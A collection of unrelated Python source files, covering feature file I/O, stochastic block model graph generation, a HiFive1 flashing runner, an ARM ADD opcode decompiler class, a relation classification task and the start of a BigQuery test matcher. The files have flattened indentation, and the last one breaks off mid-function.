the-stack_0_25157
import numpy as np
def write_to_file_features(output_file, features):
"""
    writes a data sample (matrix) to file
write whole dataset to file:
for i in range(dataset.shape[0]):
write_to_file_features("example.txt", dataset[i])
:param output_file: file to write to
:param features: data sample
"""
with open(output_file, 'a+') as file_stream:
for f in features:
for el in f:
file_stream.write(str(el))
file_stream.write(",")
file_stream.write('\n')
def write_to_file_labels(output_file, vector):
"""
write elements of a 1d vector to file
:param output_file: output file
:param vector: data to be written
"""
with open(output_file, 'w+') as file:
for item in vector:
file.write(str(item))
file.write('\n')
def features_from_file(input_file, num_features=20):
"""
extract mfcc features from file
:param input_file: feature file
:param num_features: feature count
:return: extracted features
"""
features_matrix = []
with open(input_file, 'r') as file_stream:
for matrix in file_stream:
matrix_str = matrix.strip("\n").split(",")
matrix_float = [float(matrix_str[i]) for i in range(len(matrix_str) - 1)]
matrix_float = np.array(matrix_float)
matrix_float = matrix_float.reshape(num_features, 35)
features_matrix.append(matrix_float)
return np.array(features_matrix)
def labels_from_file(input_file):
labels = []
with open(input_file, 'r') as file:
for line in file:
line = line.strip('\n')
labels.append(line)
return labels
def get_data_files(filepath, prefix, num_epochs, num_features=41,
model_type='lstm'):
"""
model folder of type: type_prefix_features
model file of type: prefix_features_epochs.model
means and stddev file of type: means/stddev_prefix_numfeatures.npy
"""
num_epochs = str(num_epochs)
num_features = str(num_features)
model_name = '_'.join([model_type, prefix, num_features])
model_file = model_name + '_' + num_epochs + ".model"
model_path = filepath + model_name + "/"
means_file = '_'.join(["means", prefix, num_features]) + ".npy"
stddevs_file = '_'.join(["stddev", prefix, num_features]) + ".npy"
means_file = model_path + means_file
stddevs_file = model_path + stddevs_file
model_file = model_path + model_file
return model_file, means_file, stddevs_file
def add_history(filepath, history_train, history_valid, metrics):
"""
add to history from metrics collected on train, test data
:param filepath:
:param metrics: metrics to save to the file
:param history_train: dict containing training metrics per epoch
    :param history_valid: tuple containing validation metrics per epoch
"""
for i in range(len(metrics)):
with open(filepath + "_" + metrics[i], "a+") as file:
file.write(str(history_train[metrics[i]][0]))
file.write(" ")
file.write(str(history_valid[i]))
file.write('\n')
def load_metric(filepath):
"""
load the metric data from a file
:param filepath: file to store metric data
:return: np array containing metric data of type (train, validation)
"""
history = list()
with open(filepath, 'r') as file:
for line in file:
            values = [float(i) for i in line.strip(" \n").split(" ")]
values = np.asarray(values)
history.append(values)
return np.asarray(history)
def concat_files(dirpath, filenames, out_file, lines_per_file=-1):
"""
concatenate multiple files into a single one
:param dirpath: path to the files
:param filenames: the list of filenames to concatenate
:param out_file: where to store the concatenated data
:param lines_per_file: how many lines to take from each file
"""
if dirpath[-1] != '/':
dirpath = dirpath + '/'
out_path = dirpath + out_file
if lines_per_file == -1:
lines_per_file = 2 ** 20
with open(out_path, 'w') as outfile:
for filename in filenames:
count = 0
file_path = dirpath + filename
with open(file_path) as infile:
for line in infile:
if line != "" and count < lines_per_file:
outfile.write(line)
count += 1
elif count >= lines_per_file:
break
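# ---------------------------------------------------------------------------
# Usage sketch (not part of the original module): round-trip a small dataset
# through the writer and reader defined above. The file name "example.txt" and
# the dataset shape are illustrative assumptions, and the file is assumed not
# to exist yet because write_to_file_features appends.
def _demo_feature_roundtrip():
    dataset = np.random.rand(3, 20, 35)  # 3 samples of 20 x 35 features
    for i in range(dataset.shape[0]):
        write_to_file_features("example.txt", dataset[i])
    restored = features_from_file("example.txt", num_features=20)
    assert restored.shape == (3, 20, 35)
    return restored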
the-stack_0_25158
# --------------------------------------------------------------------------------
# Copyright (c) 2017-2020, Daniele Zambon, All rights reserved.
#
# Implements models derived by the degree-corrected stochastic block model.
# --------------------------------------------------------------------------------
import numpy as np
from .graph import Graph
from functools import reduce
class DegreeCorrectedStochasticBlockModel(object):
"""
Wilson, James D., Nathaniel T. Stevens, and William H. Woodall. ``Modeling and estimating change in temporal
networks via a dynamic degree corrected stochastic block model.'' arXiv preprint arXiv:1605.04049 (2016).
"""
def __init__(self, communities, prob_matrix, theta=None, delta=None):
"""
:param communities: (list of lists) partition of set {0, ..., n-1}
:param prob_matrix: (np.ndarray(no_communities, no_communities)) inter- and intra-community link propensity
:param theta: (np.ndarray(no_nodes,)) degree correction
:param delta: (np.ndarray(no_communities,)) parameters to generate random theta
"""
# Nodes
node_set = sorted(reduce((lambda x, y: x + y), communities))
assert (np.arange(len(node_set)) == np.array(
node_set)).all(), "communities is not a partition of {0, 1, ..., n-1}"
self.no_vertices = len(node_set)
# Communities
self.communities = [np.array(c) for c in communities]
self.no_communities = len(self.communities)
membership_onehot = np.zeros((self.no_vertices, self.no_communities), dtype=int)
for ci, c in enumerate(self.communities):
membership_onehot[c, ci] = 1
# Community link probabilities
self.probabilities = prob_matrix if isinstance(prob_matrix, np.ndarray) else np.array(prob_matrix)
assert self.probabilities.ndim == 2
assert self.probabilities.shape[0] == self.probabilities.shape[1]
assert self.probabilities.shape[0] == self.no_communities
assert (self.probabilities == self.probabilities.T).all()
# Degree corrections
self.theta = theta if theta is not None else self._generate_theta(delta)
Theta_mat = np.dot(self.theta.reshape(-1, 1), self.theta.reshape(1, -1))
# Expected adjacency matrix
self.expected_adj = membership_onehot.dot(self.probabilities).dot(membership_onehot.T)
self.expected_adj *= Theta_mat
def _generate_theta(self, delta):
""" Generates theta from delta. """
theta = np.ones(self.no_vertices)
if delta is None:
pass
else:
delta_ar = delta if isinstance(delta, np.ndarray) else np.array(delta)
if delta_ar.ndim == 1:
delta_ar = delta_ar.reshape(-1, 1)
delta_ar = np.hstack([delta_ar] * 2)
elif delta_ar.shape[1] < 2:
                delta_ar = np.hstack([delta_ar] * 2)
            assert delta_ar.ndim == 2 and delta_ar.shape[1] == 2
assert np.all(delta_ar >= 0.)
for r, cr in enumerate(self.communities):
theta[cr] += np.random.uniform(low=-delta_ar[r, 0], high=delta_ar[r, 1], size=len(cr))
theta[cr] *= len(cr) / np.sum(theta[cr])
return theta
def get(self, no_graphs=1, distrib="poisson", format="cdg"):
"""
Generates a set of graphs from the model.
:param no_graphs: (int)
:param distrib: (str in {"poisson", "uniform"})
:param format: (str, def="cdg")
:return: a list of `no_graphs` instances of cdg.graph.Graph
"""
if distrib == "poisson":
rand_vals = np.random.poisson(lam=self.expected_adj,
size=(no_graphs, self.no_vertices, self.no_vertices))
else:
rand_vals = np.random.rand(no_graphs, self.no_vertices, self.no_vertices)
for n in range(no_graphs):
rand_vals[n] = np.tril(rand_vals[n], -1) + np.tril(rand_vals[n], -1).T + np.eye(self.no_vertices)
if distrib == "poisson":
adjmat = rand_vals > 0
ef = rand_vals[..., None]
else:
adjmat = rand_vals <= self.expected_adj[None, ...]
ef = [None] * no_graphs
adjmat = adjmat.astype(int)
nf = [None] * no_graphs
if format == 'npy':
return adjmat, nf, ef
else:
return [Graph(adjmat[i], nf[i], ef[i]) for i in range(no_graphs)]
class StochasticBlockModel(DegreeCorrectedStochasticBlockModel):
"""
P. W. Holland, K. B. Laskey, and S. Leinhardt, ``Stochastic blockmodels: First steps'', Social Networks, vol. 5,
    no. 2, pp. 109–137, 1983.
"""
def __init__(self, communities, prob_matrix):
super().__init__(communities=communities,
prob_matrix=prob_matrix,
delta=None)
def get(self, no_graphs=1, distrib="uniform", format="cdg"):
return super().get(no_graphs=no_graphs, distrib=distrib, format=format)
class ErdosRenyiModel(StochasticBlockModel):
def __init__(self, no_vertices, prob_edge):
super().__init__(communities=[list(range(no_vertices))], prob_matrix=[[prob_edge]])
class DynamicsGenerator(object):
def __init__(self, alpha, getter):
assert alpha <= 1. and alpha > 0
self.alpha = alpha # Continuity parameter
self.getter = getter
def get(self, graph_seed=None, no_graphs=1):
"""
Generates a set of graphs from the model.
:param no_graphs: (int)
:param graph_seed: (cdg.Graph, def=False)
:return: a list of `no_graphs` instances of cdg.graph.Graph
"""
graph_0 = self.getter() if graph_seed is None else graph_seed
G = [graph_0]
for _ in range(no_graphs - 1):
rand_mat = np.random.rand(*(graph_0.adj.shape)) / 2.
rand_mat += rand_mat.T
mask_e = np.where(rand_mat > self.alpha)
mask_n = np.where(np.diag(rand_mat) > self.alpha)
graph_1 = self.getter()
graph_1.adj[mask_e] = graph_0.adj[mask_e]
graph_1.ef[mask_e] = graph_0.ef[mask_e]
graph_1.nf[mask_n] = graph_0.nf[mask_n]
G.append(graph_1)
graph_0 = graph_1
return G
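# ---------------------------------------------------------------------------
# Usage sketch (not part of the original module): sample a few graphs from a
# two-community stochastic block model. The community sizes and link
# probabilities are illustrative assumptions; format='npy' returns plain numpy
# arrays and avoids constructing cdg.graph.Graph instances.
def _demo_sbm():
    sbm = StochasticBlockModel(communities=[[0, 1, 2], [3, 4, 5]],
                               prob_matrix=[[0.8, 0.1], [0.1, 0.8]])
    adjmat, nf, ef = sbm.get(no_graphs=4, format='npy')
    return adjmat  # shape (4, 6, 6): symmetric 0/1 adjacency matrices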
the-stack_0_25159
# Copyright (c) 2019, Timon Baetz
#
# SPDX-License-Identifier: Apache-2.0
'''HiFive1-specific (flash only) runner.'''
from os import path
from runners.core import ZephyrBinaryRunner, RunnerCaps
class HiFive1BinaryRunner(ZephyrBinaryRunner):
'''Runner front-end for the HiFive1 board, using openocd.'''
def __init__(self, cfg):
super().__init__(cfg)
self.openocd_config = path.join(cfg.board_dir, 'support', 'openocd.cfg')
@classmethod
def name(cls):
return 'hifive1'
@classmethod
def capabilities(cls):
return RunnerCaps(commands={'flash'})
@classmethod
def do_add_parser(cls, parser):
pass
@classmethod
def do_create(cls, cfg, args):
if cfg.gdb is None:
raise ValueError('--gdb not provided at command line')
return HiFive1BinaryRunner(cfg)
def do_run(self, command, **kwargs):
self.require(self.cfg.openocd)
self.require(self.cfg.gdb)
openocd_cmd = ([self.cfg.openocd, '-f', self.openocd_config])
gdb_cmd = ([self.cfg.gdb, self.cfg.elf_file, '--batch',
'-ex', 'set remotetimeout 240',
'-ex', 'target extended-remote localhost:3333',
'-ex', 'load',
'-ex', 'quit'])
self.run_server_and_client(openocd_cmd, gdb_cmd)
the-stack_0_25160
# ------------------------------------------------------------------------------
# CodeHawk Binary Analyzer
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2021-2022 Aarno Labs LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
from typing import cast, List, TYPE_CHECKING
from chb.app.InstrXData import InstrXData
from chb.app.AbstractSyntaxTree import AbstractSyntaxTree
from chb.app.ASTNode import ASTExpr, ASTInstruction
from chb.arm.ARMDictionaryRecord import armregistry
from chb.arm.ARMOpcode import ARMOpcode, simplify_result
from chb.arm.ARMOperand import ARMOperand
import chb.invariants.XXprUtil as XU
import chb.util.fileutil as UF
from chb.util.IndexedTable import IndexedTableValue
if TYPE_CHECKING:
import chb.arm.ARMDictionary
from chb.invariants.XXpr import XprCompound, XprConstant
@armregistry.register_tag("ADD", ARMOpcode)
class ARMAdd(ARMOpcode):
"""Add (register, constant)
ADD{S}<c> <Rd>, <Rn>, <Rm>{, <shift>} (arm)
ADD{S}<c> <Rd>, <Rn>, #<const> (arm, thumb)
ADD{S}<c>.W <Rd>, <Rn>, #<const> (thumb)
ADD{S}<c> <Rdn>, #<const> (thumb)
ADD<c> <Rdn>, <Rm> (thumb)
ADD<c> SP, <Rm> (thumb)
ADD<c> <Rd>, SP, #<const> (thumb)
ADD<c> SP, SP, #<const> (thumb)
ADD<c> <Rdm>, SP, <Rdm> (thumb)
tags[1]: <c>
args[0]: {S}
args[1]: index of op1 in armdictionary
args[2]: index of op2 in armdictionary
args[3]: index of op3 in armdictionary
args[4]: is-wide (thumb)
"""
def __init__(
self,
d: "chb.arm.ARMDictionary.ARMDictionary",
ixval: IndexedTableValue) -> None:
ARMOpcode.__init__(self, d, ixval)
self.check_key(2, 5, "Add")
@property
def operands(self) -> List[ARMOperand]:
return [self.armd.arm_operand(i) for i in self.args[1:-1]]
@property
def writeback(self) -> bool:
return self.args[0] == 1
def mnemonic_extension(self) -> str:
wb = "S" if self.writeback else ""
cc = ARMOpcode.mnemonic_extension(self)
return wb + cc
def annotation(self, xdata: InstrXData) -> str:
"""xdata format: a:vxxxx .
vars[0]: lhs (Rd)
xprs[0]: rhs1 (Rn)
xprs[1]: rhs2 (Rm{..})
xprs[2]: rhs1 + rhs2 (syntactic)
xprs[3]: rhs1 + rhs2 (simplified)
"""
lhs = str(xdata.vars[0])
result = xdata.xprs[2]
rresult = xdata.xprs[3]
xresult = simplify_result(xdata.args[3], xdata.args[4], result, rresult)
return lhs + " := " + xresult
def assembly_ast(
self,
astree: AbstractSyntaxTree,
iaddr: str,
bytestring: str,
xdata: InstrXData) -> List[ASTInstruction]:
annotations: List[str] = [iaddr, "ADD"]
(lhs, _, _) = self.operands[0].ast_lvalue(astree)
(op1, _, _) = self.operands[1].ast_rvalue(astree)
(op2, _, _) = self.operands[2].ast_rvalue(astree)
binop = astree.mk_binary_op("plus", op1, op2)
result = astree.mk_assign(lhs, binop, annotations=annotations)
astree.add_instruction_span(result.id, iaddr, bytestring)
return [result]
def ast(self,
astree: AbstractSyntaxTree,
iaddr: str,
bytestring: str,
xdata: InstrXData) -> List[ASTInstruction]:
lhs = xdata.vars[0]
rhs1 = str(xdata.xprs[0])
rhs2 = xdata.xprs[1]
rhs3 = xdata.xprs[3]
if lhs == "SP" and rhs1 == "SP" and rhs2.is_constant:
return []
annotations: List[str] = [iaddr, "ADD"]
lhsasts = XU.xvariable_to_ast_lvals(lhs, astree)
if len(lhsasts) != 1:
raise UF.CHBError("ARMAdd: multiple lvals in ast")
lhsast = lhsasts[0]
if rhs1 == "SP" and rhs3.is_stack_address:
rhs3 = cast("XprCompound", rhs3)
stackoffset = rhs3.stack_address_offset()
rhslval = astree.mk_stack_variable_lval(stackoffset)
rhsast: ASTExpr = astree.mk_address_of(rhslval)
elif rhs1 == "PC" or str(rhs2) == "PC":
annotations.append("PC-relative")
if rhs3.is_int_constant:
rhsval = cast("XprConstant", rhs3).intvalue
rhsast = astree.mk_integer_constant(rhsval)
else:
rhsasts = XU.xxpr_to_ast_exprs(rhs3, astree)
if len(rhsasts) == 1:
rhsast = rhsasts[0]
else:
raise UF.CHBError(
"ARMAdd: multiple expressions in ast")
else:
return self.assembly_ast(astree, iaddr, bytestring, xdata)
result = astree.mk_assign(lhsast, rhsast, annotations=annotations)
astree.add_instruction_span(result.id, iaddr, bytestring)
return [result]
the-stack_0_25162
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains base implementation for relation classification tasks."""
from typing import Any, Callable, Dict, Optional, Text, Tuple
import flax.linen as nn
import jax.numpy as jnp
from language.mentionmemory.encoders import encoder_registry
from language.mentionmemory.modules import mlp
from language.mentionmemory.tasks import downstream_encoder_task
from language.mentionmemory.tasks import task_registry
from language.mentionmemory.utils import default_values
from language.mentionmemory.utils import jax_utils as jut
from language.mentionmemory.utils import metric_utils
from language.mentionmemory.utils.custom_types import Array, Dtype, MetricGroups # pylint: disable=g-multiple-import
import language.mentionmemory.utils.mention_preprocess_utils as mention_preprocess_utils
import ml_collections
import numpy as np
import tensorflow.compat.v2 as tf
class RelationClassifierModel(nn.Module):
"""Encoder wrapper with classification layer for relation classification.
This model takes mention-annotated text with special mentions per sample
denoted as "subject" and "object". The model generates mention encodings for
these two mentions, concatenates them and applies (potentially, multi-layer)
n-ary classification layers.
Attributes:
num_classes: number of classification labels.
num_layers: number of classification MLP layers on top of mention encodings.
input_dim: input dimensionality of classification MLP layers. This must be
equal to 2 * mention encodings size.
hidden_dim: hidden dimensionality of classification MLP layers.
dropout_rate: dropout rate of classification MLP layers.
encoder_name: name of encoder model to use to encode passage.
encoder_config: encoder hyperparameters.
dtype: precision of computation.
mention_encodings_feature: feature name for encodings of target mentions.
"""
num_classes: int
num_layers: int
input_dim: int
hidden_dim: int
dropout_rate: float
encoder_name: str
encoder_config: ml_collections.FrozenConfigDict
dtype: Dtype
mention_encodings_feature: str = 'target_mention_encodings'
layer_norm_epsilon: float = default_values.layer_norm_epsilon
def setup(self):
self.encoder = encoder_registry.get_registered_encoder(
self.encoder_name)(**self.encoder_config)
self.classification_mlp_layers = [
mlp.MLPBlock( # pylint: disable=g-complex-comprehension
input_dim=self.input_dim,
hidden_dim=self.hidden_dim,
dropout_rate=self.dropout_rate,
dtype=self.dtype,
layer_norm_epsilon=self.layer_norm_epsilon,
) for _ in range(self.num_layers)
]
self.linear_classifier = nn.Dense(self.num_classes, dtype=self.dtype)
def __call__(self, batch: Dict[str, Array], deterministic: bool):
_, loss_helpers, logging_helpers = self.encoder.forward(
batch, deterministic)
mention_encodings = loss_helpers[self.mention_encodings_feature]
subject_mention_encodings = jut.matmul_slice(
mention_encodings, batch['mention_subject_indices'])
object_mention_encodings = jut.matmul_slice(mention_encodings,
batch['mention_object_indices'])
relation_encodings = jnp.concatenate(
[subject_mention_encodings, object_mention_encodings], -1)
for mlp_layer in self.classification_mlp_layers:
relation_encodings = mlp_layer(relation_encodings, deterministic)
classifier_logits = self.linear_classifier(relation_encodings)
loss_helpers['classifier_logits'] = classifier_logits
return loss_helpers, logging_helpers
@task_registry.register_task('relation_classifier')
class RelationClassifierTask(downstream_encoder_task.DownstreamEncoderTask):
"""Class for relation classification task."""
model_class = RelationClassifierModel
@classmethod
def make_loss_fn(
cls, config: ml_collections.ConfigDict
) -> Callable[..., Tuple[float, MetricGroups, Dict[str, Any]]]:
"""Creates loss function for Relation Classifier training.
TODO(urikz): Write detailed description.
Args:
config: task configuration.
Returns:
Loss function.
"""
ignore_label = config.ignore_label
def loss_fn(
model_config: ml_collections.FrozenConfigDict,
model_params: Dict[Text, Any],
model_vars: Dict[Text, Any],
batch: Dict[Text, Any],
deterministic: bool,
dropout_rng: Optional[Dict[Text, Array]] = None,
) -> Tuple[float, MetricGroups, Dict[str, Any]]:
"""Loss function used by Relation Classifier task. See BaseTask."""
variable_dict = {'params': model_params}
variable_dict.update(model_vars)
loss_helpers, _ = cls.build_model(model_config).apply(
variable_dict, batch, deterministic=deterministic, rngs=dropout_rng)
weights = jnp.ones_like(batch['classifier_target'])
loss, denom = metric_utils.compute_weighted_cross_entropy(
loss_helpers['classifier_logits'], batch['classifier_target'],
weights)
acc, _ = metric_utils.compute_weighted_accuracy(
loss_helpers['classifier_logits'], batch['classifier_target'],
weights)
predictions = jnp.argmax(loss_helpers['classifier_logits'], axis=-1)
tp, fp, fn = metric_utils.compute_tp_fp_fn_weighted(
predictions, batch['classifier_target'], weights, ignore_label)
metrics = {
'agg': {
'loss': loss,
'denominator': denom,
'acc': acc,
},
'micro_precision': {
'value': tp,
'denominator': tp + fp,
},
'micro_recall': {
'value': tp,
'denominator': tp + fn,
}
}
auxiliary_output = {'predictions': predictions}
auxiliary_output.update(cls.get_auxiliary_output(loss_helpers))
return loss, metrics, auxiliary_output
return loss_fn
@staticmethod
def make_collater_fn(
config: ml_collections.ConfigDict
) -> Callable[[Dict[Text, tf.Tensor]], Dict[Text, tf.Tensor]]:
"""Produces function to preprocess batches for relation classification task.
This function samples and flattens mentions from input data.
Args:
config: task configuration.
Returns:
collater function.
"""
encoder_config = config.model_config.encoder_config
bsz = config.per_device_batch_size
max_batch_mentions = config.max_mentions * bsz
n_candidate_mentions = config.max_mentions_per_sample * bsz
if config.max_mentions < 2:
raise ValueError('Need at least two mentions per sample in order to '
'include object and subject mentions.')
def collater_fn(batch: Dict[Text, tf.Tensor]) -> Dict[Text, tf.Tensor]:
"""Collater function for relation classification task. See BaseTask."""
def flatten_bsz(tensor):
return tf.reshape(tensor, [bsz])
new_batch = {
'text_ids': batch['text_ids'],
'text_mask': batch['text_mask'],
'classifier_target': flatten_bsz(batch['target']),
}
# Sample mentions across batch
# We want to make sure that the subject / object mentions always have
# priority when we sample `max_batch_mentions` out of all available
# mentions. Additionally, we want these subject / object mentions to be
# in the same order as their samples. In other words, we want the first
# sampled mention to be object mention from the first sample, the second
# sampled mention to be subject mention from the first sample, the third
# sampled mention to be object mention from the second sample, etc.
subj_index = flatten_bsz(batch['subject_mention_indices'])
obj_index = flatten_bsz(batch['object_mention_indices'])
# Adjust subject / object mention positions in individual samples to their
# positions in flattened mentions.
shift = tf.range(
bsz, dtype=obj_index.dtype) * config.max_mentions_per_sample
mention_target_indices = tf.reshape(
tf.stack([subj_index + shift, obj_index + shift], axis=1), [-1])
# Sample the rest of the mentions uniformly across batch
scores = tf.random.uniform(shape=tf.shape(batch['mention_mask']))
scores = scores * tf.cast(batch['mention_mask'], tf.float32)
# We want to adjust scores for target mentions so they don't get sampled
      # for the second time. We achieve this by making their scores negative
      # (see the standalone sampling sketch at the end of this file).
def set_negative_scores(scores, indices):
indices_2d = tf.stack([tf.range(bsz, dtype=indices.dtype), indices],
axis=1)
return tf.tensor_scatter_nd_update(scores, indices_2d,
tf.fill(tf.shape(indices), -1.0))
# Note that since we're using 2D scores (not yet flattened for simplicity)
# we use unadjusted `subj_index` and `obj_index`.
scores = set_negative_scores(scores, subj_index)
scores = set_negative_scores(scores, obj_index)
# There are `2 * bsz` target mentions which were already chosen
num_to_sample = tf.maximum(max_batch_mentions - 2 * bsz, 0)
sampled_scores, sampled_indices = tf.math.top_k(
tf.reshape(scores, [-1]), num_to_sample, sorted=True)
# Note that negative scores indicate that we have double-sampled some of
# the target mentions (we set their scores to negative right above).
# In this case, we remove them.
num_not_double_sampled = tf.reduce_sum(
tf.cast(tf.not_equal(sampled_scores, -1), tf.int32))
sampled_indices = sampled_indices[:num_not_double_sampled]
# Combine target mentions (subject / object) with sampled mentions
mention_target_indices = tf.cast(mention_target_indices,
sampled_indices.dtype)
sampled_indices = tf.concat([mention_target_indices, sampled_indices],
axis=0)
sampled_indices = mention_preprocess_utils.dynamic_padding_1d(
sampled_indices, max_batch_mentions)
dtype = batch['mention_start_positions'].dtype
mention_mask = tf.reshape(batch['mention_mask'], [n_candidate_mentions])
new_batch['mention_mask'] = tf.gather(mention_mask, sampled_indices)
new_batch['mention_start_positions'] = tf.gather(
tf.reshape(batch['mention_start_positions'], [n_candidate_mentions]),
sampled_indices)
new_batch['mention_end_positions'] = tf.gather(
tf.reshape(batch['mention_end_positions'], [n_candidate_mentions]),
sampled_indices)
new_batch['mention_batch_positions'] = tf.gather(
tf.repeat(tf.range(bsz, dtype=dtype), config.max_mentions_per_sample),
sampled_indices)
new_batch['mention_target_indices'] = tf.range(2 * bsz, dtype=dtype)
new_batch['mention_subject_indices'] = tf.range(bsz, dtype=dtype) * 2
new_batch['mention_object_indices'] = tf.range(bsz, dtype=dtype) * 2 + 1
if config.get('max_length_with_entity_tokens') is not None:
batch_with_entity_tokens = mention_preprocess_utils.add_entity_tokens(
text_ids=new_batch['text_ids'],
text_mask=new_batch['text_mask'],
mention_mask=new_batch['mention_mask'],
mention_batch_positions=new_batch['mention_batch_positions'],
mention_start_positions=new_batch['mention_start_positions'],
mention_end_positions=new_batch['mention_end_positions'],
new_length=config.max_length_with_entity_tokens,
)
# Update `text_ids`, `text_mask`, `mention_mask`, `mention_*_positions`
new_batch.update(batch_with_entity_tokens)
# Update `max_length`
max_length = config.max_length_with_entity_tokens
else:
max_length = encoder_config.max_length
new_batch['mention_target_batch_positions'] = tf.gather(
new_batch['mention_batch_positions'],
new_batch['mention_target_indices'])
new_batch['mention_target_start_positions'] = tf.gather(
new_batch['mention_start_positions'],
new_batch['mention_target_indices'])
new_batch['mention_target_end_positions'] = tf.gather(
new_batch['mention_end_positions'],
new_batch['mention_target_indices'])
new_batch['mention_target_weights'] = tf.ones(2 * bsz)
# Fake IDs -- some encoders (ReadTwice) need them
new_batch['mention_target_ids'] = tf.zeros(2 * bsz)
new_batch['segment_ids'] = tf.zeros_like(new_batch['text_ids'])
position_ids = tf.expand_dims(tf.range(max_length), axis=0)
new_batch['position_ids'] = tf.tile(position_ids, (bsz, 1))
return new_batch
return collater_fn
@staticmethod
def get_name_to_features(
config: ml_collections.ConfigDict) -> Dict[Text, Any]:
"""Return feature dict for decoding purposes. See BaseTask for details."""
encoder_config = config.model_config.encoder_config
max_length = encoder_config.max_length
name_to_features = {
'text_ids':
tf.io.FixedLenFeature(max_length, tf.int64),
'text_mask':
tf.io.FixedLenFeature(max_length, tf.int64),
'target':
tf.io.FixedLenFeature(1, tf.int64),
'mention_start_positions':
tf.io.FixedLenFeature(config.max_mentions_per_sample, tf.int64),
'mention_end_positions':
tf.io.FixedLenFeature(config.max_mentions_per_sample, tf.int64),
'mention_mask':
tf.io.FixedLenFeature(config.max_mentions_per_sample, tf.int64),
'subject_mention_indices':
tf.io.FixedLenFeature(1, tf.int64),
'object_mention_indices':
tf.io.FixedLenFeature(1, tf.int64),
}
return name_to_features
@staticmethod
def dummy_input(config: ml_collections.ConfigDict) -> Dict[Text, Any]:
"""Produces model-specific dummy input batch. See BaseTask for details."""
if config.get('max_length_with_entity_tokens') is not None:
max_length = config.max_length_with_entity_tokens
else:
max_length = config.model_config.encoder_config.max_length
bsz = config.per_device_batch_size
text_shape = (bsz, max_length)
mention_shape = (config.max_mentions)
mention_target_shape = (2 * bsz)
int_type = jnp.int32
position_ids = np.arange(max_length)
position_ids = np.tile(position_ids, (bsz, 1))
dummy_input = {
'text_ids':
jnp.ones(text_shape, int_type),
'text_mask':
jnp.ones(text_shape, int_type),
'position_ids':
jnp.asarray(position_ids, int_type),
'segment_ids':
jnp.zeros(text_shape, int_type),
'classifier_target':
jnp.ones((bsz,), int_type),
'mention_start_positions':
jnp.zeros(mention_shape, int_type),
'mention_end_positions':
jnp.zeros(mention_shape, int_type),
'mention_mask':
jnp.ones(mention_shape, int_type),
'mention_batch_positions':
jnp.ones(mention_shape, int_type),
'mention_target_indices':
jnp.arange(mention_target_shape, dtype=int_type),
'mention_target_weights':
jnp.ones(mention_target_shape, dtype=int_type),
'mention_object_indices':
jnp.arange(bsz, dtype=int_type),
'mention_subject_indices':
jnp.arange(bsz, dtype=int_type),
'mention_target_batch_positions':
jnp.arange(mention_target_shape, dtype=int_type),
'mention_target_start_positions':
jnp.zeros(mention_target_shape, int_type),
'mention_target_end_positions':
jnp.zeros(mention_target_shape, int_type),
'mention_target_ids':
jnp.zeros(mention_target_shape, int_type),
}
return dummy_input
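# -----------------------------------------------------------------------------
# Standalone sketch (not part of the original task; the toy sizes and target
# indices are illustrative assumptions): the sampling trick used inside
# `collater_fn` above, where already-chosen target mentions get their scores
# forced to -1 so that `top_k` never selects them a second time.
def _demo_negative_score_sampling():
  bsz, mentions_per_sample, num_to_sample = 2, 4, 3
  scores = tf.random.uniform((bsz, mentions_per_sample))
  target_indices = tf.constant([1, 2])  # one pre-selected mention per sample
  indices_2d = tf.stack([tf.range(bsz), target_indices], axis=1)
  scores = tf.tensor_scatter_nd_update(scores, indices_2d, tf.fill([bsz], -1.0))
  sampled_scores, sampled_indices = tf.math.top_k(
      tf.reshape(scores, [-1]), num_to_sample, sorted=True)
  # Any -1 score means a target was double-sampled; drop those entries.
  keep = tf.reduce_sum(tf.cast(tf.not_equal(sampled_scores, -1.0), tf.int32))
  return sampled_indices[:keep]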
the-stack_0_25163
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Bigquery data verifier for end-to-end test."""
# pytype: skip-file
from __future__ import absolute_import
import concurrent
import logging
import sys
import time
from hamcrest.core.base_matcher import BaseMatcher
from apache_beam.io.gcp import bigquery_tools
from apache_beam.testing.test_utils import compute_hash
from apache_beam.testing.util import BeamAssertException
from apache_beam.testing.util import equal_to
from apache_beam.utils import retry
__all__ = ['BigqueryMatcher', 'BigQueryTableMatcher']
# Protect against environments where bigquery library is not available.
# pylint: disable=wrong-import-order, wrong-import-position
try:
from google.cloud import bigquery
from google.cloud.exceptions import GoogleCloudError
except ImportError:
bigquery = None
# pylint: enable=wrong-import-order, wrong-import-position
MAX_RETRIES = 5
_LOGGER = logging.getLogger(__name__)
def retry_on_http_timeout_and_value_error(exception):
"""Filter allowing retries on Bigquery errors and value error."""
return isinstance(
